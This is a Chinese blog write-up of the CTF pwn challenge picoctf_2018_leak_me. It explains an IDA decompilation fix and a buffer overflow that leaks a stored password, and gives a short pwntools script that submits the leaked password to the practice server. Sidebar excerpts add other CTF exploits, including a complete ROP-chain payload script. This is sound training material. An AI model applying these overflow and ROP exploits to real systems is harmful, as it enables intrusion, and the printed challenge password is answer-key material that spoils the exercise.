[BUUCTF-pwn]——picoctf_2018_leak_me（内涵peak小知识）

CTF挑战解析：ida反汇编技巧与密码泄露

最新推荐文章于 2023-04-26 17:41:45 发布

原创最新推荐文章于 2023-04-26 17:41:45 发布 · 471 阅读

0 ·

CC 4.0 BY-SA版权

BUUCTF 专栏收录该内容

89 篇文章

订阅专栏

本文介绍了在解决CTF（Capture The Flag）中的pwn题目时，如何处理IDA反汇编错误，特别是针对`picoctf_2018_leak_me`挑战。作者分享了当遇到无法正常反汇编时的解决办法，并提供了利用输入溢出泄露password的思路。通过发送特定字符串，可以触发flag函数调用，从而获取比赛关键信息。

[BUUCTF-pwn]——picoctf_2018_leak_me

题目没什么难度，但是可能反汇编的时候你们可能会出现一些问题。

peak小知识

pwn题，有时会碰到无法反汇编的情况，大多数情况下，都是call的位置报错，双击函数，按F5人为给它反汇编，再返回就可以了。不过有时候，是IDA栈指针的问题，大多数还是前者居多。

思路

在IDA中，v6代表name s是password.距离0x100也就是256。

在这里插入图片描述

输入256个字符后，我们可以直接将password泄露出来。这样我们就可以在下面调用flag函数了。
在这里插入图片描述

写个小dome leek出来password再说。
在这里插入图片描述

exploit

from pwn import *
p = remote("node3.buuoj.cn",27223)
p.sendline('a')
p.recv()
p.sendline('a_reAllY_s3cuRe_p4s$word_f85406')

p.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Y-peak

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

[BUUCTF]PWN——picoctf_2018_leak_me（puts的‘\x00’绕过输出敏感数据）

mcmuyanga的博客

02-02

534

picoctf_2018_leak_me 附件步骤例行检查，32位，开启了nx保护本地运行看一下大概的情况 32位ida载入程序执行的大概流程就是先输入name，然后输入password，靶机上应该会有一个password.txt去检测是否输入是否正确，输入正确，就会调用flag函数，flag函数回将flag打印出来参数v5（存放name）和参数s（存放flag）在栈上的位置相差不远，而且给参数v5读入数据的时候可以覆盖道参数s 他们相差0x154-0x54=0x100,而且我们对v

[BUUCTF-pwn]——picoctf_2018_can_you_gets_me

Y_peak的博客

02-24

492

[BUUCTF-pwn]——picoctf_2018_can_you_gets_me 题目地址：https://buuoj.cn/challenges#picoctf_2018_can_you_gets_me 通过这道题又学到了一个知识点。ROPgadget构造rop链还是先checksec一下在IDA中，查看一下。有gets栈溢出，又有puts函数。想当然的我们想到，通过puts函数，leek出一个got表地址，找到libc的栈基址，进而找到system函数和’/bin/sh’ 尝试过后你会

参与评论您还未登录，请先登录后发表或查看评论

BUUCTF(pwn) picoctf_2018_leak_me

半岛铁盒的博客

04-06

424

这题难度不大,分析好流程就可以; name,与密码是紧挨着的,相差0x100,即256 我们可以利用puts() 进行溢出泄漏密码; 因为 puts() 函数输出遇到\x00停止; from pwn import * p = remote(“node3.buuoj.cn”,27388) p.sendline(‘a’) p.recv() p.sendline(‘a_reAllY_s3cuRe_p4s$word_f85406’) p.interactive() ...

picoctf_2018_leak_me

weixin_51298357的博客

01-30

527

picoctf_2018_leak_me 反编译修复+满足条件后leak 0x01 这道题一开始F5不能显示伪代码。会显示又有个地方有问题，快捷键g输入有问题的地方的地址，然后点进去先反编译有问题的这个函数，然后再出来反编译整个函数就好了 0x02 查看程序里的函数大体看一下程序，执行流：程序执行puts输出name → 输入password→password正确时得到flag main函数中fgets函数的地方存在漏洞 # -*- coding: utf-8 -*- from pwn

[BUUCTF]PWN——picoctf_2018_shellcode

mcmuyanga的博客

01-23

831

picoctf_2018_shellcode 附件步骤虽然题目都叫shellcode了，肯定没有开什么保护，但还是例行检查，32位程序本地试运行一下，看看大概的情况 32位ida打开，没法f5，只能看汇编了，汇编太长就不截图了，做题做多了，直接看vlun，一般这个函数都有漏洞看到vlun里调用了gets，参数是ebp+arg_0,结合main函数我们可以看到，gets 函数写入的地址即为 [ebp+var_A0] 对应的地址然后在main函数里又发现，我们gets写入的地址，下

[BUUCTF-pwn]——picoctf_2018_buffer overflow 0

Y_peak的博客

04-28

536

[BUUCTF-pwn]——picoctf_2018_buffer overflow 0 好久不写BUU了，手都快生了赶快过来写写。通过观察源文件发现，首先有put函数不需要去libc中找，同时argv肯定大于1，也就是需要至少两个参数，才可以到else语句，同时vuln函数的参数是第二个参数。进入vuln函数内部看看，找到strcpy函数这个函数是一个典型的可以用来利用溢出的函数。所以我们可以在这里进行栈溢出，以此调用puts函数打印flag.因为flag在bss段上。 from pwn imp

BUUCTF pwn——picoctf_2018_rop chain

CNS-Enterprise BCC-1701-J

04-26

691

BUUCTF 做题练习

非常规情况下栈溢出系统调用——PicoCTF_2018_can-you-gets-me

PLpa的博客

08-04

590

前言：对于这种非常规的栈溢出题目，我自己也是见的比较少，故写此博客记录一下。解题思路查看保护只开了NX保护的32位程序，如果是常规题的话，应该是非常容易做的。进入IDA查看伪代码打开IDA，如果是第一次见这种题目就会傻眼了。题目中的每一个函数都好像是自己写的，那么我们就不能利用got表来泄露函数地址来getshell了。题目开了NX保护，我们不能写shellcode，常规的ROP又利用不了，我们就完全利用不了libc里边的函数了。乍一看，好像没什么办法了，但是我们可以用程序中非常多的g

PicoCTF_2018_are_you_root(未初始化验证漏洞)

seaaseesa的博客

04-17

954

PicoCTF_2018_are_you_root 首先，检查一下程序的保护机制然后，我们用IDA分析一下，只要符合条件就可以显示flag，但是按照正常的逻辑是不能的。 Login时，会malloc一个堆，大小为0x10，并且偏移8处就是auth的验证码。但是login时，并没有初始化*(v7+8)处的值，使得它的值是前面的操作影响。而strdup函数，内部会malloc一个与字符...

BUUCTF刷题4

m0_51251108的博客

10-30

493

题目：hitcon2014_stkof：pwnable_hacknote：ciscn_2019_s_9:picoctf_2018_shellcode：npuctf_2020_easyheap：cmcc_pwnme2：x_ctf_b0verfl0w：picoctf_2018_leak_me:suctf_2018_basic pwn：cmcc_pwnme1: hitcon2014_stkof：参考师傅：(4条消息) 好好说话之unlink_hollk’s blog-优快云博客_好好说话之unlink 利用方

[BUUCTF-pwn]——warmup_csaw_2016

Y_peak的博客

01-30

5956

BUUCTF——warmup_csaw_2016 题目地址：https://buuoj.cn/challenges 题目：管他三七二十一，先将文件下载下来再说。老规矩，现在Linux上用checksec看看文件。64位，Stack、NX、PIE都没有开，应该是栈溢出的题。赶快 go go go 去window 上用IDA反汇编看看，看到返回的是gets函数，一个典型的可以利用栈溢出覆盖的地方。其他没什么有用的信息。按Shift + F12，看一下字符串。不看不知道一看有惊喜。cat flag.

[BUUCTF-pwn]——ciscn_2019_n_3

Y_peak的博客

11-20

3294

[BUUCTF-pwn]——ciscn_2019_n_3 结构体： //该结构体仅仅是选择字符串的时候的结构体 struct chunk { void *rec_str_print(); void *rec_str_free(); char *str; } //该结构体仅仅是选择数字的时候的结构体 struct chunk { void *rec_int_print(); void *rec_int_free(); int number; } 这道题目就是简单的u

[BUUCTF-pwn]——ciscn_2019_n_8

Y_peak的博客

02-10

3065

[BUUCTF-pwn]——ciscn_2019_n_8 题目地址:https://buuoj.cn/challenges#ciscn_2019_n_8 题目上去checksec一下,吓一跳保护基本全开了。在IDA中一看，开心了。如此简单　只需要v[13] ==17 就好。因为var是以字符串的形式输入的。所以exploit如下: exploit from pwn import * p = remote("node3.buuoj.cn",29772) p.sendline("aaaa"*13 +

[BUUCTF-pwn]——jarvisoj_level0

Y_peak的博客

01-31

2771

[BUUCTF-pwn]——jarvisoj_level0 题目地址：https://buuoj.cn/challenges#jarvisoj_level0 题目：还是先下载下来在Linux上checksex一下，基本确实又是栈溢出了。 64位，所以我们用64位的IDA打开，没什么有用的信息，点开vulnerable_function函数发现栈溢出的read函数，前面为0意味着标准读入，后面的长度也可以。没毛病就是这个地方了。再翻翻其他函数，发现了我们想要的system函数。找到位置，和需要覆

[BUUCTF-pwn]——ciscn_2019_es_2(内涵peak小知识)

Y_peak的博客

02-16

1984

[BUUCTF-pwn]——ciscn_2019_es_2 题目地址: https://buuoj.cn/challenges#ciscn_2019_es_2 这是一道栈劫持的题,第一次写这种题的题解写的详细一点。栈劫持 or 栈迁移栈劫持也可以称为栈迁移，用来解决栈本身可以利用的空间不够用，一般是溢出空间不够用,没办法有效构造rop链。这个时候我们可以通过劫持ebp的方式，利用leave 和 ret两个汇编指令来做到栈劫持(栈迁移)。 leave 等价于 mov ebp, esp; pop

[BUUCTF-pwn]——others_shellcode

Y_peak的博客

02-12

1968

[BUUCTF-pwn]——others_shellcode 题目地址: https://buuoj.cn/challenges#others_shellcode peak 小知识写这道题之前, 大家首先要了解, 想要获得一个shell, 除了system("/bin/sh") 以外, 还有一种更好的方法, 就是系统调用中的 execve("/bin/sh", NULL, NULL)获得shell。我们可以在 Linxu系统调用号表中找到对应的系统调用号,进行调用, 其中系统调用号用 eax 储存

picoctf_2018_rop chain 1这是什么原理

最新发布

07-20

### 栈溢出与ROP链的基本原理在`picoCTF_2018_rop_chain`题目中，漏洞函数`vuln()`中使用了`gets()`函数，导致了缓冲区溢出问题。攻击者可以通过精心构造的输入覆盖栈上的返回地址，从而控制程序流。由于开启了NX保护，无法直接执行shellcode，因此需要使用ROP（Return Oriented Programming）技术来绕过保护机制。 ### win_function1和win_function2的作用题目中的`win_function1()`和`win_function2(int a1)`函数用于设置两个全局变量`win1`和`win2`的值。只有当这两个变量都被设置为1，并且传递给`flag()`函数的参数`a1`等于`0xDEADBAAD`（即-559039827），才能触发打印flag的操作。具体来说： - `win_function1()`将`win1`设置为1。 - `win_function2(int a1)`只有在`win1`为1且传入的参数`a1`等于`0xBAAAAAAD`（即-1163220307）时，才会将`win2`设置为1[^1]。 ### 构造ROP链的过程为了满足上述条件，攻击者需要构造一个ROP链，依次调用`win_function1`、`win_function2`和`flag`函数，并正确传递参数。具体步骤如下： 1. **填充缓冲区**：首先需要填充足够的字节（例如`0x18`字节）以覆盖缓冲区，直到覆盖到返回地址的位置。 2. **调用win_function1**：由于`win_function1`不需要参数，因此直接调用即可。此时`win1`被设置为1。 3. **调用win_function2**：为了使`win2`被设置为1，需要在调用`win_function2`时传递参数`0xBAAAAAAD`。 4. **调用flag函数**：最后调用`flag`函数，并传递参数`0xDEADBAAD`，以满足条件并打印flag[^3]。 ### 示例代码以下是构造payload的具体Python代码示例，使用了`pwntools`库来简化ROP链的构造过程： ```python from pwn import * # 连接到目标服务 io = process("./PicoCTF_2018_rop_chain") elf = ELF('./PicoCTF_2018_rop_chain') # 获取函数地址 win1_addr = elf.symbols['win_function1'] win2_addr = elf.symbols['win_function2'] flag_addr = elf.symbols['flag'] # 构造payload payload = b'a' * (0x18 + 4) # 填充缓冲区 payload += p32(win1_addr) # 调用win_function1 payload += p32(win2_addr) # 调用win_function2 payload += p32(flag_addr) # 调用flag函数 payload += p32(0xBAAAAAAD) # win_function2的参数 payload += p32(0xDEADBAAD) # flag函数的参数 # 发送payload io.sendlineafter("Enter your input> ", payload) io.interactive() ``` ### 栈帧结构的构造在构造ROP链时，需要特别注意栈帧结构的布局。每个函数调用后，返回地址会被压入栈中。因此，需要确保每个函数调用后的返回地址指向下一个函数的入口，并且参数正确传递。具体来说： - `win_function1`的调用不需要参数，因此只需在其后放置`win_function2`的地址。 - `win_function2`需要一个参数`0xBAAAAAAD`，因此在其后放置该参数。 - `flag`函数需要一个参数`0xDEADBAAD`，因此在其后放置该参数[^4]。通过这种方式，可以逐步构建出满足条件的ROP链，最终触发flag的打印。